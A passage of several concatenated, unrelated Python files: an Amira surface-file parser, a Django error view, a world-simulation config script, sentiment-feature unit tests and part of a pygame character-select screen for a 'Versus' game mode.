).reshape(*new_shape)
elif self.format == 'HxByteRLE':
size = int(np.prod(np.array(self.shape)))
return hxbyterle_decode(
data,
size
).reshape(*new_shape)
else:
raise ValueError('unknown data stream format: \'{}\''.format(self.format))
# explicit instead of assumption
elif self._header.format == 'ASCII':
return np.fromstring(
data,
dtype=_type_map[self.type],
sep="\n \t"
).reshape(*new_shape)
else:
raise ValueError("unknown file format: {}".format(self._header.format))
class AmiraHxSurfaceDataStream(AmiraDataStream):
"""Class that defines an Amira HxSurface data stream"""
def read(self):
"""Extract the data streams from the HxSurface file"""
with open(self._header.filename, 'rb') as f:
# rewind the file pointer to the end of the header
f.seek(len(self._header))
data = f.read()
# get the vertex count and streams
_vertices_regex = r".*?\n" \
r"Vertices (?P<vertex_count>\d+)\n" \
r"(?P<streams>.*)".encode('ASCII')
vertices_regex = re.compile(_vertices_regex, re.S)
match_vertices = vertices_regex.match(data)
# todo: fix for full.surf and simple.surf
# print(f"streams: {match_vertices.group('streams')}")
vertex_count = int(match_vertices.group('vertex_count'))
# get the patches
# fixme: general case for NBranchingPoints, NVerticesOnCurves, BoundaryCurves being non-zero
stream_regex = r"(?P<vertices>.*?)\n" \
r"NBranchingPoints (?P<branching_point_count>\d+)\n" \
r"NVerticesOnCurves (?P<vertices_on_curves_count>\d+)\n" \
r"BoundaryCurves (?P<boundary_curve_count>\d+)\n" \
r"Patches (?P<patch_count>\d+)\n" \
r"(?P<patches>.*)".encode('ASCII')
match_streams = re.match(stream_regex, match_vertices.group('streams'), re.S)
# instatiate the vertex block
vertices_block = AmiraHxSurfaceDataStream('Vertices', self._header)
# set the data for this stream
vertices_block._stream_data = match_streams.group('vertices')
# length, type and dimension are needed for decoding
vertices_block.add_attr('length', vertex_count)
vertices_block.add_attr('type', 'float')
vertices_block.add_attr('dimension', 3)
vertices_block.add_attr('data', vertices_block.get_data())
vertices_block.add_attr('NBranchingPoints', 0)
vertices_block.add_attr('NVerticesOnCurves', 0)
vertices_block.add_attr('BoundaryCurves', 0)
# instantiate the patches block
patches_block = AmiraHxSurfaceDataStream('Patches', self._header)
patch_count = int(match_streams.group('patch_count'))
patches_block.add_attr('length', patch_count)
# get the triangles and contents of each patch
# fixme: general case for BoundaryID, BranchingPoints being non-zero
# i've not seen an example with loaded fields
# todo: consider compiling regular expressions
# NOTE:
# There is a subtlety with this regex:
# It might be the case that the last part matches bytes that end in '\n[}]\n'
# that are not the end of the stream. The only way to remede this is to include the
# extra brace [{] so that it now matches '\n[}]\n[{]', which is more likely to
# correspond to the end of the patch. However this introduces a problem:
# we will not be able to match the last patch unless we also add [{] to the stream to match.
# This also means that start_from argument will be wrong given that it will have past
# the starting point of the next patch. This is trivial to solve because we simply
# backtrack start_from by 1.
# These are noted in NOTE A and NOTE B below.
_patch_regex = r"[{]\n" \
r"InnerRegion (?P<patch_inner_region>.*?)\n" \
r"OuterRegion (?P<patch_outer_region>.*?)\n" \
r"BoundaryID (?P<patch_boundary_id>\d+)\n" \
r"BranchingPoints (?P<patch_branching_points>\d+)\n" \
r"\s+\n" \
r"Triangles (?P<triangle_count>.*?)\n" \
r"(?P<triangles>.*?)\n" \
r"[}]\n[{]".encode('ASCII')
patch_regex = re.compile(_patch_regex, re.S)
# start from the beginning
start_from = 0
for p_id in range(patch_count):
# NOTE A
match_patch = patch_regex.match(match_streams.group('patches') + b'{', start_from)
patch_block = AmiraHxSurfaceDataStream('Patch', self._header)
patch_block.add_attr('InnerRegion', match_patch.group('patch_inner_region').decode('utf-8'))
patch_block.add_attr('OuterRegion', match_patch.group('patch_outer_region').decode('utf-8'))
patch_block.add_attr('BoundaryID', int(match_patch.group('patch_boundary_id')))
patch_block.add_attr('BranchingPoints', int(match_patch.group('patch_branching_points')))
# let's now add the triangles from the patch
triangles_block = AmiraHxSurfaceDataStream('Triangles', self._header)
# set the raw data stream
triangles_block._stream_data = match_patch.group('triangles')
# decoding needs to have the length, type, and dimension
triangles_block.add_attr('length', int(match_patch.group('triangle_count')))
triangles_block.add_attr('type', 'int')
triangles_block.add_attr('dimension', 3)
# print('debug:', int(match_patch.group('triangle_count')), len(match_patch.group('triangles')))
# print('debug:', match_patch.group('triangles')[:20])
# print('debug:', match_patch.group('triangles')[-20:])
triangles_block.add_attr('data', triangles_block.get_data())
# now we can add the triangles block to the patch...
patch_block.add_attr(triangles_block)
# then we collate the patches
patches_block.append(patch_block)
# the next patch begins where the last patch ended
# NOTE B
start_from = match_patch.end() - 1 # backtrack by 1
# add the patches to the vertices
vertices_block.add_attr(patches_block)
# add the vertices to the data stream
self.add_attr(vertices_block)
def _decode(self, data):
is_little_endian = self._header.endian == 'LITTLE'
if self._header.format == 'BINARY':
return np.frombuffer(
data,
dtype=_type_map[is_little_endian][self.type]
).reshape(self.length, self.dimension)
elif self._header.format == 'ASCII':
return np.fromstring(
data,
dtype=_type_map[self.type],
sep="\n \t"
).reshape(self.length, self.dimension)
@deprecated(
"DataStreams class is obsolete, access data using stream_data and data attributes of corresponding metadata block attributes of AmiraHeader instance")
class DataStreams(object):
__slots__ = ("_header", "__stream_data")
def __init__(self, header):
self._header = header
with warnings.catch_warnings():
warnings.simplefilter('ignore')
if self._header.filetype == "AmiraMesh":
self.__stream_data = self._header.data_pointers
else:
self.__stream_data = dict()
for _streamblock in _dict_iter_keys(_hyper_surface_file):
_streamlist = _streamblock # self._header._stream_loader.__class__._group_array_map.get(_streamblock,_streamblock).format('List')
_streamlist = getattr(self._header, _streamlist, None)
if _streamlist is None:
continue
self.__stream_data[_streamblock] = _streamlist
def __getattribute__(self, attr):
if attr in ("file", "header", "stream_data", "filetype"):
return super(DataStreams, self).__getattribute__(attr)()
return super(DataStreams, self).__getattribute__(attr)
@deprecated("use <AmiraHeader>.filename instead")
def file(self):
return self._header.filename
@deprecated("use AmiraHeader instance directly")
def header(self):
return self._header
@deprecated(
"access data of individual streams through corresponding attributes and dedicated stream_data and data attributes of meta data blocks")
def stream_data(self):
return self.__stream_data
@deprecated("use <AmiraHeader>.filetype attribute instead")
def filetype(self):
return self._header.filetype
@deprecated
def __len__(self):
return len(self.__stream_data)
@deprecated
def __iter__(self):
return iter(_dict_iter_values(self.__stream_data))
@deprecated
def __getitem__(self, key):
return self.__stream_data[key]
@deprecated
def __repr__(self):
return "{} object with {} stream(s): {} ".format(
self.__class__,
len(self),
", ".join(_dict_iter_keys(self.__stream_data))
)
|
import traceback
import logging
from django.shortcuts import render
# Create your views here.
def error_404(request):
'''
It is 404 customize page.
Use this method with handler if we need to customize page from backend.
'''
data = {}
return render(request,'common/404.html', data)
def load_on_startup():
try:
# print("Something....")
# raise Exception("This is a sample Exception!")
from apis.components.factories.managers_factory import ManagersFactory
ManagersFactory.get_instance().register_all_managers()
except Exception as e:
logging.info("Path: project/views.py Source: load_on_startup() Error: %s", str(e))
logging.info(traceback.format_exc())
|
result=[]
base=[1,2,3]
for x in base:
for y in base:
result.append((x,y))
print(result)
|
from world_simulation import WorldEngine, EngineConfig
mp = WorldEngine(5, 5)
EngineConfig.ModelsConfig.HerbivoreConfig.number_min = 1
EngineConfig.ModelsConfig.HerbivoreConfig.number_max = 1
EngineConfig.ModelsConfig.HerbivoreConfig.health_min = 4
EngineConfig.ModelsConfig.HerbivoreConfig.health_max = 6
EngineConfig.ModelsConfig.HerbivoreConfig.age_min = 20
EngineConfig.ModelsConfig.HerbivoreConfig.age_max = 35
EngineConfig.ModelsConfig.FoodConfig.number_min = 0
EngineConfig.ModelsConfig.FoodConfig.number_max = 2
EngineConfig.ModelsConfig.FoodConfig.spawn_number_min = 2
EngineConfig.ModelsConfig.FoodConfig.spawn_number_max = 3
EngineConfig.ModelsConfig.FoodConfig.age_min = 5
EngineConfig.ModelsConfig.FoodConfig.age_max = 5
EngineConfig.ModelsConfig.FoodConfig.health_min = 2
EngineConfig.ModelsConfig.FoodConfig.health_max = 5
EngineConfig.WorldConfig.load_model(EngineConfig.ModelsConfig.HerbivoreConfig)
EngineConfig.WorldConfig.load_model(EngineConfig.ModelsConfig.FoodConfig)
mp.run_loop(while_alive=True)
|
from pyfuzzy_toolbox import transformation as trans
from pyfuzzy_toolbox import preprocessing as pre
import pyfuzzy_toolbox.features.count as count_features
import pyfuzzy_toolbox.features.max as max_features
import pyfuzzy_toolbox.features.sum as sum_features
import test_preprocessing as tpre
import nose
print 'Loading test text 1'
bow_sentences_1 = pre.start(tpre.text_1)
bow_sentences_1 = trans.start(bow_sentences_1)
print 'Loading test text 1a'
bow_sentences_1a = pre.start(tpre.text_1a)
bow_sentences_1a = trans.start(bow_sentences_1a)
print 'Loading test text 2a'
bow_sentences_2a = pre.start(tpre.text_2a)
bow_sentences_2a = trans.start(bow_sentences_2a)
""" ----------------------------- SUM FEATURES ----------------------------- """
"""UNIGRAMS"""
def test_sum_of_positive_adjectives_scores():
expected_sum = 0.0855961827957
sum_of_positive_adjectives = sum_features.sum_of_unigrams_scores(bow_sentences_1)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adjectives)
def test_sum_of_positive_adverbs_scores():
expected_sum = 0.0
sum_of_positive_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.ADVS)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adverbs)
def test_sum_of_positive_verbs_scores():
expected_sum = 0.02447258064516129
sum_of_positive_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.VERBS)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_verbs)
def test_sum_of_negative_adjectives_scores():
expected_sum = -0.06547738317757008
sum_of_negative_adjectives = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adjectives)
def test_sum_of_negative_adverbs_scores():
expected_sum = -0.00891862928349
sum_of_negative_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adverbs)
def test_sum_of_negative_verbs_scores():
expected_sum = 0.0
sum_of_negative_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_verbs)
def test_sum_ratio_of_positive_adjectives_scores():
expected_sum = 0.0004601945311596716
sum_of_positive_adjectives = sum_features.sum_of_unigrams_scores(
bow_sentences_1, ratio=True)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adjectives)
def test_sum_ratio_of_positive_adverbs_scores():
expected_sum = 0.0
sum_of_positive_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, ratio=True)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_adverbs)
def test_sum_ratio_of_positive_verbs_scores():
expected_sum = 0.00013157301422129724
sum_of_positive_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, ratio=True, positive=True)
nose.tools.assert_almost_equal(expected_sum, sum_of_positive_verbs)
def test_sum_ratio_of_negative_adjectives_scores():
expected_sum = -0.0008910665972944851
sum_of_negative_adjectives = sum_features.sum_of_unigrams_scores(
bow_sentences_1, ratio=True, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adjectives)
def test_sum_ratio_of_negative_adverbs_scores():
expected_sum = -2.7783891848875693e-05
sum_of_negative_adverbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, ratio=True, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_adverbs)
def test_sum_ratio_of_negative_verbs_scores():
expected_sum = -0.000179220719158
sum_of_negative_verbs = sum_features.sum_of_unigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, ratio=True, positive=False)
nose.tools.assert_almost_equal(expected_sum, sum_of_negative_verbs)
def test_positive_to_negative_ratio_sum_scores_adjectives():
expected_ratio_sum = (0.0855961827957 + (-0.165738387097))
positive_to_negative_ratio = sum_features.positive_to_negative_ratio_sum_unigrams_scores(
bow_sentences_1)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio)
def test_positive_to_negative_ratio_sum_scores_adverbs():
expected_ratio_sum = (0.0105152647975 + (-0.00891862928349))
positive_to_negative_ratio = sum_features.positive_to_negative_ratio_sum_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio)
def test_positive_to_negative_ratio_sum_scores_verbs():
expected_ratio_sum = (0.0223977570093 + (0.0))
positive_to_negative_ratio = sum_features.positive_to_negative_ratio_sum_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio)
"""BIGRAMS"""
def test_sum_of_positive_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = 0.0855961827957
sum_of_positive_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adjectives_and_bigrams_with_adjectives)
def test_sum_of_negative_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = -2.2411307476635516
sum_of_negative_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, positive=False)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adjectives_and_bigrams_with_adjectives)
def test_sum_of_positive_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = 0.0
sum_of_positive_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adverbs_and_bigrams_with_adverbs)
def test_sum_of_negative_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = -0.00891862928349
sum_of_negative_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=False)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adverbs_and_bigrams_with_adverbs)
def test_sum_of_positive_verbs_scores_and_bigrams_with_verbs():
expected_sum = 0.7079659139784946
sum_of_positive_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_verbs_and_bigrams_with_verbs)
def test_sum_of_negative_verbs_scores_and_bigrams_with_verbs():
expected_sum = -0.0333350537634
sum_of_negative_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=False)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_verbs_and_bigrams_with_verbs)
def test_sum_ratio_of_positive_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = 0.0855961827957 / 186
sum_of_positive_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adjectives_and_bigrams_with_adjectives)
def test_sum_ratio_of_negative_adjectives_scores_and_bigrams_with_adjectives():
expected_sum = -0.006981715724808572
sum_of_negative_adjectives_and_bigrams_with_adjectives = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, positive=False, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adjectives_and_bigrams_with_adjectives)
def test_sum_ratio_of_positive_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = 0.0
sum_of_positive_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_adverbs_and_bigrams_with_adverbs)
def test_sum_ratio_of_negative_adverbs_scores_and_bigrams_with_adverbs():
expected_sum = -0.00891862928349 / 321
sum_of_negative_adverbs_and_bigrams_with_adverbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=False, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_adverbs_and_bigrams_with_adverbs)
def test_sum_ratio_of_positive_verbs_scores_and_bigrams_with_verbs():
expected_sum = 0.003806268354723089
sum_of_positive_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_positive_verbs_and_bigrams_with_verbs)
def test_sum_ratio_of_negative_verbs_scores_and_bigrams_with_verbs():
expected_sum = -0.0333350537634 / 186
sum_of_negative_verbs_and_bigrams_with_verbs = sum_features.sum_of_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=False, ratio=True)
nose.tools.assert_almost_equal(
expected_sum, sum_of_negative_verbs_and_bigrams_with_verbs)
def test_positive_to_negative_ratio_sum_scores_adjectives_and_bigrams_with_adjectives():
expected_ratio_sum = 0.0855961827957 - 0.165738387097
positive_to_negative_ratio_sum = sum_features.positive_to_negative_ratio_sum_unigrams_and_bigrams_scores(
bow_sentences_1)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio_sum)
def test_positive_to_negative_ratio_sum_scores_adverbs_and_bigrams_with_adverbs():
expected_ratio_sum = 0.0
positive_to_negative_ratio_sum = sum_features.positive_to_negative_ratio_sum_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio_sum)
def test_positive_to_negative_ratio_sum_scores_verbs_and_bigrams_with_verbs():
expected_ratio_sum = 0.6746308602150538
positive_to_negative_ratio_sum = sum_features.positive_to_negative_ratio_sum_unigrams_and_bigrams_scores(
bow_sentences_1, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS)
nose.tools.assert_almost_equal(
expected_ratio_sum, positive_to_negative_ratio_sum)
""" ----------------------------- COUNT FEATURES ----------------------------- """
"""UNIGRAMS"""
def test_positive_scores_adjectives_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, positive=True)
assert expected_count == 16
def test_negative_scores_adjectives_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, positive=False)
assert expected_count == 4
def test_positive_scores_adverbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, positive=True)
assert expected_count == 1
def test_negative_scores_adverbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, positive=False)
assert expected_count == 2
def test_positive_scores_verbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, positive=True)
assert expected_count == 5
def test_negative_scores_verbs_count():
expected_count = count_features.count_of_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, positive=False)
assert expected_count == 0
def test_positive_to_negative_scores_ratio_of_adjectives_count():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS)
assert expected_count == (16 - 4)
def test_positive_to_negative_scores_ratio_of_adverbs_count():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS)
assert expected_count == (1 - 2)
def test_positive_to_negative_scores_ratio_of_verbs_count():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS)
assert expected_count == (5 - 0)
"""BIGRAMS"""
def test_positive_scores_adjectives_count_and_bigrams_with_adjectives():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS, positive=True)
assert expected_count == (16 + 1)
def test_negative_scores_adjectives_count_and_bigrams_with_adjectives():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS, positive=False)
assert expected_count == (4 + 3)
def test_positive_scores_adverbs_count_and_bigrams_with_adverbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=True)
assert expected_count == (1 + 0)
def test_negative_scores_adverbs_count_and_bigrams_with_adverbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS, positive=False)
assert expected_count == (2 + 0)
def test_positive_scores_verbs_count_and_bigrams_with_verbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=True)
assert expected_count == (5 + 1)
def test_negative_scores_verbs_count_and_bigrams_with_verbs():
expected_count = count_features.count_of_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS, positive=False)
assert expected_count == (0 + 0)
def test_positive_to_negative_scores_ratio_of_adjectives_count_and_bigrams_with_adjectives():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS)
assert expected_count == (16 + 1) - (4 + 3)
def test_positive_to_negative_scores_ratio_of_adverbs_count_and_bigrams_with_adverbs():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS)
assert expected_count == (1 + 0) - (2 + 0)
def test_positive_to_negative_scores_ratio_of_verbs_count_and_bigrams_with_verbs():
expected_count = count_features.positive_to_negative_ratio_count_unigrams_and_bigrams_scores(
bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS)
assert expected_count == (5 + 1) - (0 + 0)
def test_count_selected_ngrams():
assert count_features.count_selected_ngrams(bow_sentences_1) == 17
assert count_features.count_selected_ngrams(bow_sentences_1a) == 33
assert count_features.count_selected_ngrams(bow_sentences_2a) == 13
""" ----------------------------- MAX FEATURES ----------------------------- """
"""UNIGRAMS"""
def test_max_rule_score_for_adjective():
assert max_features.max_rule_score_for_unigrams(
bow_sentences_1a, unigram=count_features.ADJS)['sign'] == 0
def test_max_rule_score_for_adverbs():
assert max_features.max_rule_score_for_unigrams(
bow_sentences_1a, unigram=count_features.ADVS)['sign'] == 1
def test_max_rule_score_for_verbs():
assert max_features.max_rule_score_for_unigrams(
bow_sentences_1a, unigram=count_features.VERBS)['sign'] == 1
"""BIGRAMS"""
def test_max_rule_score_for_adjective_and_bigrams_with_adjectives():
assert max_features.max_rule_score_for_unigrams_and_bigrams(bow_sentences_1a, unigram=count_features.ADJS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADJS) == 0
def test_max_rule_score_for_adverbs_and_bigrams_with_adverbs():
assert max_features.max_rule_score_for_unigrams_and_bigrams(bow_sentences_1a, unigram=count_features.ADVS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.ADVS) == 1
def test_max_rule_score_for_verbs_and_bigrams_with_verbs():
assert max_features.max_rule_score_for_unigrams_and_bigrams(bow_sentences_1a, unigram=count_features.VERBS, bigram_word_1=count_features.ADVS, bigram_word_2=count_features.VERBS) == 1
""" ----------------------------- PERCENTAGE FEATURES ----------------------------- """
def test_percentage_of_negated_ngrams_by_document_size():
nose.tools.assert_almost_equal(0.00537634408602, count_features.percentage_of_negated_ngrams_by_document_size(bow_sentences_1)['value'])
nose.tools.assert_almost_equal(0.0155763239875, count_features.percentage_of_negated_ngrams_by_document_size(bow_sentences_1a)['value'])
nose.tools.assert_almost_equal(0.0127388535032, count_features.percentage_of_negated_ngrams_by_document_size(bow_sentences_2a)['value'])
""" ----------------------------- MODULE TESTS ----------------------------- """
def test_all_count_features():
features_list = count_features.all(bow_sentences_1)
attributes = []
data = []
for fl in features_list:
attributes.append((fl['name'], 'REAL'))
data.append(fl['value'])
bow_sentences_1_dict = {'attributes': attributes, 'data': data}
# print bow_sentences_1_dict['attributes']
# print '------------------------------------------'
# print bow_sentences_1_dict['data']
assert len(bow_sentences_1_dict['attributes']) == len(bow_sentences_1_dict['data']) == 27
def test_all_sum_features():
features_list = sum_features.all(bow_sentences_1)
attributes = []
data = []
for fl in features_list:
attributes.append((fl['name'], 'REAL'))
data.append(fl['value'])
bow_sentences_1_dict = {'attributes': attributes, 'data': data}
# print bow_sentences_1_dict['attributes']
# print '------------------------------------------'
# print bow_sentences_1_dict['data']
assert len(bow_sentences_1_dict['attributes']) == len(bow_sentences_1_dict['data']) == 40
def test_all_max_features():
features_list = max_features.all(bow_sentences_1)
attributes = []
data = []
for fl in features_list:
attributes.append((fl['name'], 'REAL'))
data.append(fl['value'])
bow_sentences_1_dict = {'attributes': attributes, 'data': data}
# print bow_sentences_1_dict['attributes']
# print '------------------------------------------'
# print bow_sentences_1_dict['data']
assert len(bow_sentences_1_dict['attributes']) == len(bow_sentences_1_dict['data']) == 8
|
"""
This is used for Versus game againts the computer with all characters.
"""
import os
import pygame
from battle import Battle
from colors import *
class Versus(object):
def __init__(self, game):
# Start loading
with game.load():
self.game = game
self.window = self.game.window
self.characters = []
self.warriors = []
self.enemies = []
self.warrior_images = []
self.enemy_images = []
# Load player and add it to characters
self.game.set_game(True)
self.characters.append(self.game.player)
# Original player skills
# the skills that were loaded from the last save,
# (doesn't mean allskills, just the skills he was using)
self.original_player_skills = dict(self.game.player.skills)
# Load all other unlocked characters
self.unlocked_characters = self.get_unlocked_characters()
self.get_npcs_from_files()
# Images and texts
self.title = self.game.display_text("Curse of Tenebrae", SILVER)
self.battle_bg = pygame.image.load("images/vsbackground.png").convert()
self.frame = pygame.image.load("images/vsframe.png").convert_alpha()
self.warriors_text = self.game.display_text("Warriors", SILVER)
self.enemies_text = self.game.display_text("Enemies", SILVER)
# self.charselect_bg = pygame.image.load("IMAGE HERE!").convert()
self.new_char_img_width = 100
self.new_char_img_height = 115
# Errors
self.no_chosed_warriors = self.game.display_text(
"You need to at least choose 1 warrior.",
FIREBRICK
)
self.no_chosed_enemies = self.game.display_text(
"You need to at least choose 1 enemy.",
FIREBRICK
)
# Start
self.characters_select()
def get_unlocked_characters(self):
"""
Gets the names of unlocked characters
and return a list with their names.
"""
characters = []
with open("story/unlockedchars.txt") as fl:
for line in fl:
characters.append(line.strip())
return characters
def get_npcs_from_files(self):
"""
Creates the characters that are part of the
unlocked_characters list.
"""
npcs_filepath = "maps"
npc_files = []
for fl in os.listdir(npcs_filepath):
if "npcs" in fl and ".txt" == os.path.splitext(fl)[1]:
npc_files.append(fl)
for npcfl in npc_files:
with open(os.path.join(npcs_filepath, npcfl)) as nfl:
npcs = nfl.readlines()
for npcline in npcs:
npc = self.game.make_npc(npcline)
if npc is not None and npc.name in self.unlocked_characters:
self.characters.append(npc)
def get_rects_and_images(self):
"""
Returns tuple of two lists, first one contains all new character images,
and the second one all rects of those images.
"""
character_images = []
character_rects = []
shift_x = 25
shift_y = self.game.WINDOW_HEIGHT/2
chars_per_row = 8
chars_rowcount = 0
shift_x_by = 100
shift_y_by = 120
for char in self.characters:
# Set new smaller image
newimg = pygame.transform.scale(char.warrior_image,
[self.new_char_img_width, self.new_char_img_height])
character_images.append(newimg)
# Set rect for that image
newimg_rect = self.game.set_rect(newimg, shift_x, shift_y)
character_rects.append(newimg_rect)
shift_x += shift_x_by
if chars_rowcount == chars_per_row:
shift_x = 50
shift_y += shift_y_by
chars_rowcount = 0
chars_rowcount += 1
return character_images, character_rects
def clear(self):
"""
It clears the chosed warriors and chosed enemies after the game.
"""
# Change images back to where they were
self.change_image_direction()
for char in self.warriors + self.enemies:
if char in self.warriors:
self.warriors.remove(char)
self.warrior_images = []
elif char in self.enemies:
self.enemies.remove(char)
self.enemy_images = []
self.characters.append(char)
def change_image_direction(self):
"""
Flips horizontally warrior images since all images face to the right,
we need the warriors to face toward the left.
"""
new_warrior_images = []
for warrior in self.warriors:
newimg = pygame.transform.flip(warrior.warrior_image, True, False)
warrior.warrior_image = newimg
def set_chosed_chars_rects(self, charscount, shift_x, shift_y, shift_x_by):
"""
Returns a list with new rectangular points for the chosed warriors or enemies.
"""
new_rects = []
for _ in range(charscount):
rect = pygame.Rect(shift_x, shift_y,
self.new_char_img_width, self.new_char_img_height)
shift_x += shift_x_by
new_rects.append(rect)
return new_rects
def characters_select(self):
"""
Displays the screen in which character select happens.
"""
errors = False
error = None
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.game.quit_game()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_l:
self.game.show_skills()
if event.key == pygame.K_ESCAPE:
